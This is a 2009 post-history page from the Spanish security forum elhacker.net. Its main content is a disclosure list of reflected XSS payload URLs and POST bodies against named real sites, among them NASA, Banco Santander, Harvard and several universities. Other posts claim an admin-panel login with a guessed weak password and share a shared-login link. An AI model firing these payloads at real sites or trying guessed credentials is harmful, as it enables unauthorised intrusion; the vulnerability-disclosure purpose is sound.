elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 ... 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 [408] 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 ... 456
4071  Foros Generales / Sugerencias y dudas sobre el Foro / Re: cuentas correo @elhacker.net en: 9 Febrero 2009, 21:48 pm
de que hablas WHK, si claro :xD todos saben que el password de el-brujo es amoalauraperoesperarehastaelmatrimonio..

http://www.bugmenot.com/view/foro.elhacker.net
(voten que si sirven!!)

Tambien sale la mia..

Saludos!!
jajajajjaja que risa el de anelkaos XD
4072  Foros Generales / Sugerencias y dudas sobre el Foro / Re: cuentas correo @elhacker.net en: 9 Febrero 2009, 21:40 pm
Si os cuento lo que me acaba de pasar....
Me metí en esta página para verla: https://www.google.com/a/elhacker.net/LoginAction2?service=CPanel
Entonces, metí en el primer cuadro "administrador", y en el segundo una contraseña, y.... ¡LOGIN! Creo que pronto va a haber otro admin al mando :xD

No, no piensen mal de mí. Solo escribo esto para decirle a el-brujo que cambie la contraseña (porque esta es poco segura)

es cierto ya entre con la cuenta de el-brujo
jajajajaja
 ;)

Mentira, diciendo esas tonteras después con que cara van a estar pidiendo que les regalen cuentas  :huh:, una cuenta de este dominio se gana con esfuerzo, dedicación y bocación por la seguridad informática y de esta comunidad no por quien postea mas o simplemente para mostrarselos a sus compañeros de estudios. Si alguien demuestra una ayuda o aporte que lo merezca de seguro lo obtendrá sin la necesidad de pedirlo y no copiando tutos o teniendo una mentalidad como hasta ahora, si alguien quiere una cuenta @elhacker.net piense que ha hecho para ganarsela, obiamente tampoco creo que se la den a gente que solo quiera abusar de el.

Las cuentas de este dominio están reservadas para aquellos que lo necesiten como los señores Wiki o gente del staff, personas que se lo merecen por torneos, pruebas, etc.

Recuerdo que la primera ves que me pusieron de colaborador lo fuí sin pedirlo porque una cosa es ayudar para ser staff y otra cosa es ayudar para que esto salga adelante y son dos motivaciones totalmente diferentes, a mi me gusta el tema de la informática en general y hasta ahora todo lo que he hecho lo hago desinteresadamente y no para tener estrellas ni cuentas ni un perfil que diga mod o colab, eso se obtiene debido a tu colaboración y/o empeño no y no el esforzarse para ser destacado o algo así. Las cosas que te dan acá son producto de lo que haces y no debes hacerlos para obtener esos pequeños detalles porque si fuera así entonces tus intenciones no son verdaderas y con eso ya tendrías una idea si realmente mereces esa cuenta o no.
4073  Programación / PHP / Re: Que finalidad tiene esto? en: 8 Febrero 2009, 08:40 am
Código
Mas corto y ya, con eso ya no te pueden joder con una sql inyeccion a menos que procese algun dato sin encerrarse en comillas o integrar integers sin filtrar (int)$val, todo depende de $string
4074  Seguridad Informática / Nivel Web / Re: Bugs en smf 1.1.7 en: 7 Febrero 2009, 03:36 am
Citar
Estaria bien hacer un taller de buscar vulnerabilidades a SMF =P, a alguien le interesa?
A mi me interesa, es mas.. si vas a la sección de bugs en simplemachines podrás ver muchisimos bugs reportados que nunca aparecieron en ningún sitio de advisorie porque son muchos y los parches aparecen antes de ser expuestos y los que si son conocidos son los que se publican antes de ser parchado.

Lo mas recomendable en este caso es utilizar no-script como precaución mínima si es que tienes alguna cuenta de permisos elevados en un sistema web cualquiera como Administrador, moderador, publicador de noticias, etc y nunca navegar en tu sistema web con tu usuario logueado para evitar ataques aunque en este caso en especial el atacante puede enviarte el script de ataque por medio del privado forzando al administrador a estar logueado para visualizarlo.
4075  Informática / Software / Re: Cursos "Guias "Libros Y Manuales De Todo Tipo En Descarga Directa Aqui!!!! en: 4 Febrero 2009, 07:17 am
Citar
E-Sword-Biblia - Sofware Biblico en descarga directa
Ya lo tengo gracias de todas formas pero habia uno que si me interesaba pero ninguno tiene enlace de descarga  :-\
4076  Informática / Software / Re: Cursos "Guias "Libros Y Manuales De Todo Tipo En Descarga Directa Aqui!!!! en: 4 Febrero 2009, 06:15 am
Hola, cual es la biblia en español mas antigua que puedas encontrar? tengo una de Reina Valera de 1909, si puedes encontrar alguna que pudiera ser mas antigua por favor. Gracias.
4077  Seguridad Informática / Nivel Web / Temas mas destacados "fallas y explotaciones a nivel Web" Actualizado: 31/5/10 en: 4 Febrero 2009, 05:06 am
Los temas más destacados sobre fallas y explotaciones a nivel Web

Advisories
4078  Programación / PHP / Re: Include PHP en: 29 Enero 2009, 05:25 am
knap, no solo rfi, sino lfi, path disclosure o full path disclosure XD

Prueba esto mejor:

Código
  1. if(!@include(preg_replace('|[^A-Za-z0-9_]|i', '', $_POST['user']).'.php')){
  2. echo 'No existe.';
  3. }
4079  Seguridad Informática / Nivel Web / Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection en: 29 Enero 2009, 03:52 am
Antes que nada hay que decir que todos los administradores de estos sitios webs fueron avisados de sus multiples fallas para que pudiesen ser corregidas antes de ser expuestas, solo un webmaster respondió y fue webtaller, el resto la mayoría los reparó solo en parte. esto es para tener un poco de consiencia al momento de crear un sitio web o manetener uno de que esto de la seguridad web no es algo para tomar a la ligera, antiguamente un xss era considerado de bajo riesgo pero con el tiempo ya se ha considerado medio alto dependiendo del caso ya que puedes no causar nada como la obtensión de privilegios de administración en los mismos sitios.

Ninguna web fue afectada.

Descubridor: todas por WHK.

La Nasa
Código:
http://mynasa.nasa.gov/portal/site/mynasa/template.'"><h1>XSS

La Nasa nuevamente
Código:
http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78

MTV
Código:
http://www.mtvla.com/news/droplets/email_story_form.jhtml?title="><h1>XSS

Defcon
Código:
https://pics.defcon.org/misc.php?action=cookies
Editas tu cookie bbsessionhash:%3Ch1%3EXSS+by+WHK%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E

Telefónica
Código:
http://195.53.169.41/jsp/CDoResult.jsp?QUERYTYPE=32&QUERYTXT=lol&QUERYLEVEL=2&SESION=a';}%3C/script%3E%3Ch1%3EXSS%20by%20WHK%3Cscript%3E%3C!–&NOMLIB=tel_chile_lib|grupo_tel_chile_lib|salaprensa_lib&QUERYSTRING=&IDIOM=&FILEINI=default_cl&SALADEPRENSA=&PAIS=CL

Foros Terra
Código:
http://foros.terra.com.mx/portada.cfm?s=F&pCat=11"><br><br><br><h1>XSS

Descargas Terra
Código:
http://descargas.terra.es/index.phtml?&action=all&id_section=1"><script>alert(1) ;</script>&search="><br><h1>XSS

Simantec (de Norton Antivirus)
Código:
http://www.symantecstore.com/dr/v2/ec_main.entry25?page= ESUpgradeRenewal&client=Symantec&sid=41185&cid=2073aaaa"><br><br><br><h1>XSS%20by%20WHK<br><br><br>

Esest (de Nod32 Antivirus)
Código:
http://www.nod32.bg/ (en el buscador de arriba poner "><h1>XSS )

Infosecurityevent
Código:
http://www.infosecurityevent.com/App/homepage.cfm?keywords=%22%3E%3Ch1%3EXSS+by+WHK%3Cbr%3E%3C%2Fh1%3E&appname=100004&moduleid=42&siteadvsearch=1&collections=1%2C2%2C3%2C4%2C5%2C6%2C9&searchtype=all&displaytype=relevance&searchmethod=basic&fuseaction=search.results&go.x=14&go.y=8

Megaupload
Código:
http://www.megaupload.com/signup/es/index.php (petición POST al valor 'email' "><h1>XSS )

Winamp
Código:
http://www.winamp.com/skins/search/?s=m&q=;"></script><script>alert(/XSS/);</script>

Imageshack
Código:
http://reg.imageshack.us/content.php?page=email&q=abuse2/><h1>XSS

Webtaller
Código:
http://www.webtaller.com/regsystem/login.php?ref=/envios/enviar_articulo.php?id="><h1>XSS

Universidad Surcolombiana (Colombia)
Código:
http://portal.usco.edu.co:8080/portal/portal/pagina.jsp?id=70"><h1>XSS%20by%20WHK<script>alert(/XSS%20by%20WHK/);</script>&index=1"><h1><br>XSS

Universidad de Chile
Código:
http://www.uchile.cl/uchile.portal?_nfpb=true&_pageLabel=not&url=42454"><h1>XSS

Pontificia Universidad Católica de Chile
Código:
http://www.uc.cl/ (donde dice "buscar personas" poner "><h1>XSS )

Universidad Iberoamericana de México
Código:
http://enlinea3.uia.mx/www/busqueda_uia.cfm?busqueda=%22%3E%3Ch1%3EXSS

Universidad de Buenos Aires UBA (Argentina)
Código:
http://www.uba.ar/comunicacion/difusion/agenda/encurso.php?dia=7&mes="><h1>XSS7&?o=2007#4106

Universidade de São Paulo USP (Brasil)
Código:
http://noticias.usp.br/acontece/obterNoticia?codntc=17246&codnucjrn=1"><h1>XSS

Universidad Harvard (Estados Unidos)
Código:
https://www.pin1.harvard.edu/pin/submit-login (en datos poner "><h1>XSS )

Sourceforge
Código:
http://sourceforge.net/search/?type_of_search=soft&words=';"/></script><h1>XSS<script>alert();</script>

Softronic
Código:
http://zonealarm-antivirus.softonic.com/?refmkt=6aaaaa"><script>alert(/XSS by WHK/);</script>

WikiWix (Buscador Wikipedia)
Código:
http://es.wikiwix.com/index.php?action="><h1>XSS<br><br>?=es&bg=es

Nintendo
Código:
http://www.nintendo-europe.com/NOE/es/ES/search/search.jsp?searchText=';}}"></script><h1>XSS<script>alert();</script>&indexName=all

Sony
Código:
http://www.sony.es/search/Search.action?applicationtype=Search&searchtype=product&site=odw_es_ES?ion=es_ES_Search&start=1&page=ProductMultiSiteSearchResult&shortcut=true&query=';</script><script>alert();</script>&locale=es_ES&brand=default&allSections=true

Meanwhile
Código:
http://meanwhile.com/?domain=hackxcrack.com"><h1><br>XSS by WHK<script>&

SPAM(1)
Código:
http://www.SPAM(1)/top/search.php (en el buscador poner "><h1>XSS )

SPAM(3) (elhacker.org)
Código:
http://elhacker.org/ (en el buscador poner "><h1>XSS )

New-Bytes.net
Código:
http://md5.new-bytes.net/encoder.php (donde dice codificar poner '"><h1>XSS )

Codebreak.tk
Código:
http://codebreak.uni.cc/tools/shellcode.php (poner </textarea><h1>XSS )

ElHacker.net
Código:
http://ns2.elhacker.net/cgi-bin/birdcast.cgi (Crear una referencia con contenido HTML incrustado)

Dimitrix
Código:
http://www.dimitrix.es/youtube/ (poner </textarea><h1>XSS )

Piojosoft
Código:
http://www.piojosoft.com/index.php?sección=programas/buscatop&pclaves=<script>alert(/XSS/)</script>

Portalhacker.net
Código:
http://www.portalhacker.net/buscar.php (metodo post a un input llamado query ""><h1>XSS " mas el valor "ok " en el valor "buscar")

DarkNet.org
Código:
http://www.darknet.org/ (metodo GET al input 's' :  ""><h1>XSS ")

BlindSec
Código:
http://www.blindsec.com/notes.php (Editar el texto escapando con un '</textarea>' y guardando)

johnny.ihackstuff
Código:
http://johnny.ihackstuff.com/index.php?searchword=';alert('XSS')// &option=com_search&Itemid=5

Las FARC
Código:
http://www.farcep.org/?node=3&op=search&date_range=E+0&search_string=%27%22%3E%3Ch1%3Etest&imageFiel
d.x=0&imageField.y='%22%3E%3Ch1%3Etest0<script>alert(/esto es un problema/);</script>

Universidad DUOC de Chile
Código:
http://mercadolaboral.duoc.cl/alerta.cfm?msg='%22%3E%3Ciframe%20src=http://xssed.com%3E

Zone-H
Código:
http://www.zone-h.org/index.php?searchword=';alert('XSS')//%20&option=com_search&Itemid=5

Banco Santander
Código:
http://www.santander.com/csgs/Satellite?accesibilidad=3&canal=CAccionistas&cid=1147087106975&empr=SA
NCorporativo&leng=es_ES&pagename=SANCorporativo/Page/SC_ContenedorBuscadorGeneral&pagina=99999999999
99999999'"><script>alert(/xss/);</script>

Anonymouse
Código:
http://anonymouse.org/cgi-bin/anon-email.cgi
POST: to=yo%40noexist.fakeeeeee&subject=<script>alert(2)</script>&text=<script>alert(1)</script>

Ejercito de Chile
Código:
http://www.ejercito.cl/busqueda/index.php
POST: PHPSESSID=478a586e7ac990faa11abde01c939ad8&texto=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pub_d esde=&pub_hasta=&contenido=0&image222.x=0&image222.y=0

Yahoo
Código:
http://es.search.yahoo.com/search?p=http%3A%2F%2Fwww.huifa.cl%2Fbuscador%2Fbuscar.php%3F%26cod_rubro
%3D%26cb%3D%26criterio%3D%3C%2Ftitle%3E%3Ch1%3E%3Cmarquee%3Emuajajajaja%3C%2Fmarquee%3E%3C%2Fh1%3E%3
Ctitle%3E&fr=yfp-t-501&ei=UTF-8&meta=vl%3D

Nota: las imagenes las retiré porque utilizaban demasiado espacio, ya las pondré nuevamente pero en miniaturas cuando estén listas.

Fuentes
http://www.jccharry.com/portada/component/content/article/51.html
http://xssed.com/archive/author=whk
4080  Programación / Scripting / Re: Crear nombres de archivos usando la variable %TIME% y %DATE% en: 28 Enero 2009, 06:01 am
O puedes usar esto:
Código
  1. set z=%time::=_%
  2. ren archivo.csv bkp_"%date:/=-%"" ""%z:~0,8%".csv
Páginas: 1 ... 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 [408] 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 ... 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines